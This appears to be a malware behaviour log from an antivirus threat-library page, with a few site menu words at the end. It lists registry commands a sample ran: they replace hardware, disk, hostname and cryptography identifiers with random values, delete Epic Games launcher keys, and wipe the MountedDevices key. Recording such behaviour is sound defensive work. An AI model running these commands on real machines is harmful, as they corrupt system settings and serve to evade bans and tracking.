'<SYSTEM32>\reg.exe' ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildLabEx /t REG_SZ /d 14000 /f
'<SYSTEM32>\reg.exe' ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {Apple14003-1909-11088-4685} /f
'<SYSTEM32>\cmd.exe' /c reg delete HKLM\SYSTEM\MountedDevices /f
'<SYSTEM32>\cmd.exe' /c REG delete HKCU\Software\Epic" "Games /f
'<SYSTEM32>\reg.exe' delete HKCU\Software\Epic" "Games /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Tracing\Microsoft\Profile\Profile /v Guid /t REG_SZ /d %random%-%random%-%random%-%random%%random% /f
'<SYSTEM32>\reg.exe' ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Tracing\Microsoft\Profile\Profile /v Guid /t REG_SZ /d 14006-12657-28952-287483878 /f
'<SYSTEM32>\cmd.exe' /c reg delete HKLM\SOFTWARE\Classes\com.epicgames.launcher /f
'<SYSTEM32>\reg.exe' delete HKLM\SOFTWARE\Classes\com.epicgames.launcher /f
'<SYSTEM32>\cmd.exe' /c reg delete HKLM\SOFTWARE\WOW6432Node\EpicGames /f
'<SYSTEM32>\reg.exe' delete HKLM\SOFTWARE\WOW6432Node\EpicGames /f
'<SYSTEM32>\cmd.exe' /c reg delete HKLM\SOFTWARE\WOW6432Node\Epic" "Games /f
'<SYSTEM32>\reg.exe' delete HKLM\SOFTWARE\WOW6432Node\Epic" "Games /f
'<SYSTEM32>\cmd.exe' /c reg delete HKCR\com.epicgames.launcher /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v GUID /t REG_SZ /d %random%-%random%-%random%-%random% /f
'<SYSTEM32>\reg.exe' ADD HKLM\System\CurrentControlSet\Services\Tcpip\Parameters /v Domain /t REG_SZ /d 13983 /f
'<SYSTEM32>\reg.exe' ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v REGisteredOrganization /t REG_SZ /d 13993 /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKLM\System\CurrentControlSet\Services\Tcpip\Parameters /v Domain /t REG_SZ /d %random% /f
'<SYSTEM32>\reg.exe' ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "1\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d Apple-13977-14225-320158786 /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 /v Identifier /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
'<SYSTEM32>\reg.exe' ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 /v Identifier /t REG_SZ /d Apple-13977-14225-320158786 /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 /v Identifier /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
'<SYSTEM32>\reg.exe' ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 /v Identifier /t REG_SZ /d Apple-13977-14225-320158786 /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKLM\SYSTEM\ControlSet001\Services\BasicDisplay\Video /v VideoID /t REG_SZ /d {Apple-%random%-%random%-%random%%random%} /f
'<SYSTEM32>\reg.exe' ADD HKLM\SYSTEM\ControlSet001\Services\BasicDisplay\Video /v VideoID /t REG_SZ /d {Apple-13980-24974-1711181} /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d {Apple-%random%-%random%-%random%%random%} /f
'<SYSTEM32>\reg.exe' ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d {Apple-13980-24974-1711181} /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v Hostname /t REG_SZ /d DESKTOP-%random% /f
'<SYSTEM32>\reg.exe' ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v Hostname /t REG_SZ /d DESKTOP-13983 /f
'<SYSTEM32>\reg.exe' delete HKCR\com.epicgames.launcher /f
'<SYSTEM32>\reg.exe' ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v REGisteredOwner /t REG_SZ /d 13993 /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKLM\System\CurrentControlSet\Control\DevQuery\6 /v UUID /t REG_SZ /d %random% /f
'<SYSTEM32>\reg.exe' ADD HKLM\System\CurrentControlSet\Control\DevQuery\6 /v UUID /t REG_SZ /d 13987 /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v NV" "Hostname /t REG_SZ /d DESKTOP-%random% /f
'<SYSTEM32>\reg.exe' ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v NV" "Hostname /t REG_SZ /d DESKTOP-13987 /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {Apple%random%-%random%-%random%-%random%%random%} /f
'<SYSTEM32>\reg.exe' ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {Apple13987-13703-20071-154407527} /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v GUID /t REG_SZ /d {Apple%random%-%random%-%random%-%random%%random%} /f
'<SYSTEM32>\reg.exe' ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v GUID /t REG_SZ /d {Apple13990-24451-5167-673517841} /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d %random% /f
'<SYSTEM32>\reg.exe' ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d 13990 /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v REGisteredOwner /t REG_SZ /d %random% /f
'<SYSTEM32>\cmd.exe' /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v REGisteredOrganization /t REG_SZ /d %random% /f
'<SYSTEM32>\reg.exe' ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Kernel-EventTracing/Admin /v OwningPublisher /t REG_SZ /d {14124-6384-1670210291} /f

Technologies

Terminology

Training and education

Myths

Technical Information

Curing recommendations

Free trial